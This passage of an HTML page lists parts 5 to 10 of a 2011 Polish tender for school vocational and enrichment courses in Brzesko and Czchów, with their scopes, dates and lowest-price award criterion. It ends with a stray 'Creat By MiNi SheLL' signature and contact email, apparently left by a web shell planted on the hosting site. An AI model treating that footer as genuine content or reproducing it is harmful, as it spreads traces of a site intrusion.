7.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
8.	Zamawiający zapewnia: pracownię gastronomiczną, piece konwekcyjno-parowe - 2szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Kurs fakturowania i obsługi kas fiskalnych dla ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów.
2.	Czas trwania kursu wynosi: 60 godzin, w tym 40 godzin zajęć teoretycznych i 20 godzin zajęć praktycznych.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 września 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul.Piastowska 2, 32-800 Brzesko od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym. 
4.	Kurs musi uwzględniać w części teoretycznej co najmniej tematy: Przepisy prawne związane z zawodem sprzedawcy - przegląd aktów prawnych, odpowiedzialność sprzedawcy, kasjera, postępowanie z falsyfikatami, Elementy towaroznawstwa handlowego - klasyfikacja rodzajowa i systematyka towarów, istota kodowania towarów, kodowanie towarów w Polsce i świecie, czynniki determinujące jakość towarów,  cykl życia towaru, zmiany jakościowe w towarach spowodowane czasem, czynniki działające destrukcyjnie na towary, ochrona jakości towarów w transporcie i magazynowaniu, narażenia magazynowe i transportowe, zasady przechowywania wybranych grup towarowych, kontrola warunków klimatycznych, Dokumentacja handlowa (zamówienia, oferty, umowy, dokumentacja związana z dostawą, dokumentacja związana ze sprzedażą, dokumentacja magazynowa, reklamacje i zwroty), rozliczenia i dokumentacja finansowa (rozliczenia gotówkowe, znaki pieniężne - klasyfikacja, identyfikacja, zabezpieczenia, rozliczenia bezgotówkowe za pomocą czeków, rodzaje czeków, zasady rozliczania, rozliczenia bezgotówkowe za pomocą kart płatniczych, rodzaje kart, zasady rozliczania, kasy fiskalne jako szczególna forma dokumentacji sprzedaży, rozliczenie i odprowadzanie utargów, dokumentacja finansowa sprzedaży, faktury, paragony), Dokumentacja wymiany zagranicznej (formy wymiany i rozliczeń, organizacja i dokumentacja dostaw, dokumentacja celna i podatkowa, dokumentacja w handlu zagranicznym), Część praktyczna kursu obejmie co najmniej:  obsługa kas fiskalnych - rodzaje i zastosowanie urządzeń fiskalnych, programowanie kas fiskalnych, praktyczne ćwiczenia sprzedaży z zastosowaniem kasy fiskalnej, transmisja danych z kas fiskalnych do programów magazynowych i księgowych, rozpoznawanie i kontrola znaków pieniężnych, kasy fiskalne jako szczególna forma dokumentacji sprzedaży- omówienie ustawy, komputerowy program do fakturowania - ewidencja kontrahentów, ewidencja towarów, cen i marż, rejestr sprzedaży i zakupów, kontrola stanów magazynowych, 
8.	Wykonawca zapewni  sprzęt oraz materiały dydaktyczne niezbędne do przeprowadzenia kursu oraz zeszyt w formacie A4, w twardej oprawie wraz z długopisem dla każdego uczestnika kursu.
9.	Wykonawca zapewni podczas każdego spotkania uczestnikom co najmniej jeden ciepły posiłek oraz gorące napoje (kawa i herbata).
10.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
11.	Zamawiający zapewnia: salę lekcyjną, laptop, tablica interaktywna z rzutnikiem, 5szt. kas fiskalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6: Kurs specjalista ds.  pozyskiwania funduszy unijnych dla ZS w Czchowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów.
2.	Czas trwania kursu wynosi: 5 spotkań - 30 godz. lekcyjnych, w tym przynajmniej 18 godzin zajęć praktycznych
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 lipca 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół w Czchowie, ul.Sądecka 187, 32-860 Czchów od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym. 
4.	Kurs powinien zawierać  co najmniej następujące zagadnienia: nabycie umiejętność identyfikacji projektów możliwych do finansowania z Funduszy Europejskich,  (źródła informacji o funduszach europejskich, instytucje wspierające i doradcze ), fundusze unijne dla przedsiębiorców   ( korzyści dla firm z korzystania z funduszy unijnych- czyli dlaczego warto?, status przedsiębiorstwa- mikro, mały i średni przedsiębiorca, omówienie programów pomocowych), nabycie praktycznych umiejętności konstruowania projektu unijnego i pisania wniosku aplikacyjnego, jak również dostosowania pomysłów na projekty do specyfiki wniosku aplikacyjnego - praca warsztatowa na temat: projekt, - pojęcie i typy projektów, identyfikowanie celu jakiemu projekt ma służyć, kto powinien być zaangażowany, kiedy i jak długo w realizacje projektu,  kwalifikowalność wydatków, zarządzenie projektami, matryca logiczna projektu, wnioskowanie o dofinansowanie - ocena formalna,  ocena merytoryczna, umowa o dofinansowanie, rozliczenie projektu - obowiązki beneficjenta, sprawozdanie końcowe z realizacji projektu, wnioskowanie o płatności, przygotowanie wniosku o dotację wraz z załącznikami. zasady prawidłowego wypełniania wniosku przy uwzględnieniu kryteriów oceny, omówienie załączników do wniosku aplikacyjnego, przygotowywanie wniosku o dotację- wypełnianie formularza, praca indywidualna, dyskusja, praca z generatorem wniosków. Biznes plan i stadium wykonalności projektu. Struktura biznes planu i stadium wykonalności projektu. Identyfikacja projektu z celami programu. Przygotowywanie biznes planu przedsięwzięcia oraz stadium wykonalności projektu- praca warsztatowa.  Analiza finansowa w biznes planie. Zasady tworzenia analizy finansowej. Bilans, rachunek wyników, cash flow- pojęcia, zasady tworzenia. Tworzenie analizy finansowej dla projektu- praca warsztatowa .Możliwości dofinansowania dla rozpoczynających działalność gospodarczą. Przyczyny niepowodzenia czyli analiza najczęściej popełnianych błędów. Podsumowanie- plusy i minusy funduszy unijnych.
5.	Wykonawca zapewni  sprzęt oraz materiały dydaktyczne niezbędne do przeprowadzenia kursu oraz zeszyt w formacie A4, w twardej oprawie wraz z długopisem dla każdego uczestnika kursu.
6.	Wykonawca zapewni podczas każdego spotkania uczestnikom co najmniej jeden ciepły posiłek oraz gorące napoje (kawa i herbata).
7.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
8.	Zamawiający zapewnia: salę lekcyjną, laptop - 10szt, tablica interaktywna z rzutnikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Kurs jak i w co inwestować żeby zarobić? dla ZS w Czchowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 20 uczniów w podziale na 2 grupy po 10 uczniów każda.
2.	Czas trwania kursu wynosi: 30 godzin dla każdej grupy.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 września 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół w Czchowie, ul.Sądecka 187, 32-860 Czchów od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym. 
4.	Tematyka kursu zawierać powinna między innymi omówienie następujących zagadnień: Motywy lokowania pieniędzy, Sposoby inwestowania wolnych środków pieniężnych,  Jak korzystać z możliwości jakie stwarza rynek finansowy? Lokaty bankowe  - podział, charakterystyka, oprocentowanie, Czym są ART. Banking, usługi Private Banking, usługi Basset Management? Fundusze inwestycyjne - strategie inwestowania, charakterystyka, Fundusze emerytalne, Obligacje, Bony skarbowe, Akcje, Giełda papierów wartościowych - zasady działania, Alternatywne sposoby inwestowania - złoto, kolekcjonowanie monet, waluty, nieruchomości, dzieła sztuki, inwestycje zagraniczne.
5.	Wykonawca zapewni  sprzęt oraz materiały dydaktyczne niezbędne do przeprowadzenia kursu oraz zeszyt w formacie A4, w twardej oprawie wraz z długopisem dla każdego uczestnika kursu.
6.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
7.	Zamawiający zapewnia: salę lekcyjną, laptop, tablica interaktywna z rzutnikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8: Kurs eksperymentalne nauczanie fizyki dla ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu: 15 uczniów.
2.	Czas trwania kursu wynosi: 30 godzin.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 czerwca 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul.Piastowska 2, 32-800 Brzesko od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym.
4.	Celem kursu jest przedstawienie w nowatorski i niekonwencjonalny sposób zagadnień z zakresu fizyki, który pozwoli uczniom zrozumieć, że fizyka może być łatwa i ciekawa. Wykonawca przedstawi zastosowanie fizyki w przemyśle i życiu codziennym, zachęci uczestników do dalszego pogłębiania wiedzy  z zakresu fizyki i zaszczepi pasje do tego przedmiotu.
5.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
6.	Zamawiający zapewnia: salę lekcyjną, laptop, tablica interaktywna z rzutnikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9: Kurs doradztwo zawodowe dla ZS w Czchowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 30 uczniów w podziale na 2 grupy po 15 uczniów każda.
2.	Czas trwania kursu wynosi: 30 godzin dla każdej grupy.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 września 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół w Czchowie, ul.Sądecka 187, 32-860 Czchów od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym. 
4.	Tematyka warsztatów zawierać powinna co najmniej: Zajęcia warsztatowe  z uczniami, Samopoznanie - bilans własnych mocnych i słabych stron ( wartości i zainteresowania, zdolności, potencjał pracowniczy, ),  Kompetencje w poszukiwaniu pracy ( rynek pracy, absolwent na rynku pracy, ABC poszukiwania pracy, dokumenty aplikacyjne, rozmowa kwalifikacyjna ), Przygotowanie ucznia do roli pracownika ( planowanie kariery zawodowej, moja pierwsza praca,  umowy o pracę, praca w innym kraju ), Indywidualne rozmowy doradcze ( portfolio ucznia, wypracowanie IPZ - Indywidualnego Planu Zawodowego).
5.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
6.	Zamawiający zapewnia: salę lekcyjną, laptop, tablica interaktywna z rzutnikiem, komputerowe programy z zakresu doradztwa zawodowego ( do wglądu u szkolnego lidera projektu )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10: Kurs doradztwo zawodowe dla ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów.
2.	Czas trwania kursu wynosi: 16 godzin.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 czerwca 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul.Piastowska 2, 32-800 Brzesko od poniedziałku do piątku w godzinach od 14.00 do 18.00 w dni zajęć dydaktycznych oraz w soboty lub dni wolne od zajęć dydaktycznych po wcześniejszym uzgodnieniu z liderem szkolnym. 
4.	Tematyka warsztatów zawierać powinna co najmniej: Zajęcia warsztatowe  z uczniami, Samopoznanie - bilans własnych mocnych i słabych stron ( wartości i zainteresowania, zdolności, potencjał pracowniczy, ),  Kompetencje w poszukiwaniu pracy ( rynek pracy, absolwent na rynku pracy, ABC poszukiwania pracy, dokumenty aplikacyjne, rozmowa kwalifikacyjna ), Przygotowanie ucznia do roli pracownika ( planowanie kariery zawodowej, moja pierwsza praca,  umowy o pracę, praca w innym kraju ), Indywidualne rozmowy doradcze ( portfolio ucznia, wypracowanie IPZ - Indywidualnego Planu Zawodowego).
5.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
6.	Zamawiający zapewnia: salę lekcyjną, laptop, tablica interaktywna z rzutnikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com